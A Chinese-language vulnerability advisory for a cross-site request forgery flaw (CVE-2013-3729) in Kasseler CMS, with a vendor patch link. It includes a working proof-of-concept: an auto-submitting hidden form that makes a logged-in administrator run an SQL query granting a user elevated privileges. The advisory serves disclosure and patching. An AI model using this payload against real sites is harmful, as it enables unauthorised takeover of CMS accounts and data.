发布日期:2013-07-03
更新日期:2013-07-05受影响系统:
Kasseler CMS Kasseler CMS <= 2 r1223
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 60929
CVE(CAN) ID: CVE-2013-3729Kasseler CMS是内容管理系统。Kasseler CMS 存在跨站请求伪造漏洞,此漏洞源于整个应用中缺少CSRF保护机制。远程攻击者可诱使已经登录的管理员浏览特制的网页,这些网页带有CSRF利用代码,利用此漏洞在应用的数据库中执行任意SQL查询并完全控制应用。<*来源:High-Tech Bridge Security Research Lab
链接:https://www.htbridge.com/advisory/HTB23158
http://seclists.org/bugtraq/2013/Jul/26
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!<form action="http://[host]/admin.php?module=database&do=sql_query " method="post" name="main">
<input type="hidden" name="query" value="UPDATE `kasseler`.`kasseler_users` SET `user_level` = "2", `user_group` =
"1" WHERE `kasseler_users`.`uid` =2 LIMIT 1 ;">
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>建议:
--------------------------------------------------------------------------------
厂商补丁:Kasseler CMS
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://diff.kasseler-cms.net/svn/patches/1232.htmlphpMyAdmin view_create.php 跨站脚本漏洞Android绕过数字签名可修改代码漏洞相关资讯 Kasseler CMS
- Kasseler CMS "groups" SQL注入漏 (07/07/2013 12:04:16)
| - Kasseler CMS "admin.php" HTML注 (07/06/2013 06:30:58)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
|